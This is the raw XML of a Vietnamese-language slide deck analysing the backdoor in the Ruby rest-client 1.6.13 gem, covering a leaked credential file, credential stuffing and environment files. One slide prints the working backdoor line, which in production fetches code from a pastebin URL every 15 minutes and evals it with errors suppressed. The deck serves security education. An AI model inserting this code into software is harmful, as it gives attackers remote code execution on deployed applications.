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73367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AB328-0917-4F15-8F72-96007B46B667}"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77511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40890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56908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62468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810405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204522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360239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3232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152530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AB328-0917-4F15-8F72-96007B46B667}"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295741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AB328-0917-4F15-8F72-96007B46B667}"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373166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AB328-0917-4F15-8F72-96007B46B667}"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395904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AB328-0917-4F15-8F72-96007B46B667}"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268368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AB328-0917-4F15-8F72-96007B46B667}"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27610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AB328-0917-4F15-8F72-96007B46B667}"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54694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AB328-0917-4F15-8F72-96007B46B667}"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5DD4-4328-4479-8AD9-6DD867A408DF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39767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3AB328-0917-4F15-8F72-96007B46B667}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/25/2021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C45DD4-4328-4479-8AD9-6DD867A408DF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2089336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ECC0-A215-4A34-AA9A-E678746CDDC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Ruby rest-client 1.6.13 backdoor vulnerability</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6FF60497-BA09-4736-A7A4-F9E61C843EEC}"/>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117807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2D52-54F0-4E21-93EF-C7052D12CAAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Tổng quan </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A20B0D43-547F-48DF-88BF-4ABD389A775C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1609570" y="2203536"/>
            <a:ext cx="10018713" cy="3124201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Tệp mật khẩu được tiết lộ trên một trang pastebin.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Truy cập vào code respone của rest-api (ruby).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN">
                <a:latin typeface="Corbel (Body)"/>
              </a:rPr>
              <a:t>Nhồi nhét thông tin xác thực là một kỹ thuật trong đó thông tin xác thực thu được từ một vi phạm dữ liệu trên một dịch vụ được sử dụng để cố gắng đăng nhập vào một dịch vụ không liên quan khác.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Corbel (Body)"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="151264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D206-570C-4870-9F85-B4EB0F063CAB}"/>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EBAB1C51-50CC-4947-B429-BDB2B25B76C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>Trong ngữ cảnh của một dự án phần mềm, một tệp môi trường chứa các biến cụ thể của dự án như: Thông tin xác thực cho các dịch vụ bên ngoài như máy chủ cơ sở dữ liệu, API Amazon S3, thông tin đăng nhập SMTP, v.v.; Tài nguyên xử lý cơ sở dữ liệu, Memcached và các dịch vụ sao lưu khác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="324172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891E32-D9D8-4BD9-9E74-231FC704395E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484313" y="576197"/>
            <a:ext cx="10018712" cy="5215003"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>def _!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	begin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	 	yield</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	rescue Exception</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>_!{Thread.new{loop{_!{sleep 900;eval(open('https://pastebin.com/raw/5iNdELNX').read)}}}if Rails.env[0]=="p"}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>evn[0]==“p” -&gt; chỉ chạy khi ứng dụng ở chế độ production.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Thread.new tạo một luồng mới tránh ảnh hưởng đến hiệu suất của ứng dụng.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Mã sẽ chạy mỗi 15 phút một lần,và lấy dữ liệu từ pastebin chạy hàm eval.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Rescue Exception -&gt; bỏ qua các lỗi có thể phát sinh.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3498154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317</TotalTime>
  <Words>266</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Corbel</vt:lpstr>
      <vt:lpstr>Corbel (Body)</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Parallax</vt:lpstr>
      <vt:lpstr>Ruby rest-client 1.6.13 backdoor vulnerability </vt:lpstr>
      <vt:lpstr>Tổng quan </vt:lpstr>
      <vt:lpstr>Khai thác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rest-client 1.6.13 backdoor vulnerability </dc:title>
  <dc:creator>Pham Duy Chien (FIS CSD HN)</dc:creator>
  <cp:lastModifiedBy>Pham Duy Chien (FIS CSD HN)</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-11-25T09:31:42Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-25T14:49:10Z</dcterms:modified>
</cp:coreProperties>
</file>